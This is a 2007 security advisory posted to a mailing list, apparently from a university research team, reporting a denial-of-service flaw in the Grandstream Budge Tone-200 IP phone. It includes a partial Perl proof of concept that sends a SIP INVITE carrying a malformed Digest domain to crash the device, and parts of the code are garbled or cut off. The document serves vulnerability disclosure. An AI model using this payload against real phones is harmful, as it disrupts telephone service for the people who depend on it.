Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Grandstream Budge Tone-200 denial of service vulnerability
From: "Radu State" <state () loria fr>
Date: Wed, 21 Mar 2007 12:06:57 +0100

MADYNES Security Advisory 


 <http://madynes.loria.fr/> http://madynes.loria.fr



Title: Grandstream Budge Tone-200 denial of service vulnerability 


Release Date:




      High - Denial of  Service


Advisory ID:KIPH3


Hardware: Grandstream Budge Tone-200 IP Phone



Affected Versions: Program--    Bootloader-- 

Other versions maybe.




Vulnerability Synopsis: After sending a crafted INVITE/CANCE or any message
with a "WWW-Authenticate" where the "Digest domain" is crafted the device
freezes provoking a DoS. 



Impact: A remote individual can remotely crash and perform a Denial of
Service(DoS) attack in all the services provided by the software by sending
one crafted SIP INVITE message. This is conceptually similar to the "ping of


Resolution:  The vendor was contacted at multiple times, the complete report
was sent, but no feedback whatsoever resulted.


Vulnerability Description: the device reboots after a crafted INVITE message
had been sent. 


Configuration of our device:


Software Version:   Program--    Bootloader-- 

IP-Address obtained by DHCP as 

The configuration is the default






After sending a crafted INVITE, CANCEL or any message with a
"WWW-Authenticate" where the "Digest domain" is crafted the device freezes
provoking a DoS. 




To run the exploit the file invite_grandstream.pl should be launched
(assuming our configurations) as:


perl invite_grandstream.pl 5060 Fosforito 


Proof of Concept Code:




use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]);


$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1],




$AUTH = "WWW-Authenticate: Digest
domain=\"/-+:\ () =\$\%D6\$;\$=;=\$=\$,\ () \$ =;\@;;,&&+:::=\@/2\$&;6+;+=\%A5==;\
@:=;\$&\%A3:u,\ () =\@;&;\ () +::+&;+,,&/&\ () =,;=&:&,=&:;:;;K+&\ () =\%DA*\$;\@&+&:;/=
=\%37:\%A6;,\ () \%ED,:=:\@,;\%DA;&\$)\$+=;+:\%FE\$:\@;&=,W;,g\%EF;\%FB:+\ () O\$+
\%AF+;+:,&=\%CA\%EA;\$,\ () +/;\@,-;:;,P&\@;_\$:\%C7&+&/!,\%EE\$:,\@:;;\@&\@,+,
z\ () \$;\ () \@\$\$::\@/=,\$3\%ED=\ () +\%AE/=&\@;;\$;&\$\%FE:\@;\$+:\$\%EB\$=&:;&K&
;:\ () \%EA,=\%BA6\%21;=&:\$\"\r\n";

$msg = "INVITE sip:$ARGV[2]\ () $ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP;branch=z9hG4bK056a27e7;rport\r\nFrom:
<sip:tucu\ () 192 168 1 2>;tag=as011d1185\r\nTo:
<sip:$ARGV[2]\ () $ARGV[0]>;$TOTAG\r\n$AUTH\CSeq: 6106 INVITE\r\Max-Forwards:
70\r\nContent-Length: 0\r\n\r\n";








      Humberto J. Abdelnur (Ph.D Student)

      Radu State (Ph.D)

      Olivier Festor (Ph.D)

      This vulnerability was identified by the Madynes research team at

      Lorraine, using the Madynes VoIP fuzzer.

       <http://madynes.loria.fr/> http://madynes.loria.fr/



Disclosure Distribution: 

      The advisory will be posted on the following websites:


       <http://madynes.loria.fr/> http://madynes.loria.fr website


      The advisory will be posted to the following mailing lists:


      1)    full-disclosure () lists grok org uk

      2)    voipsec () vopisa org



Information about us: Madynes is a research team at INRIA Lorraine working
on VoIP Security assessment, intrusion detection and prevention.



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
  • Grandstream Budge Tone-200 denial of service vulnerability Radu State (Mar 21)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]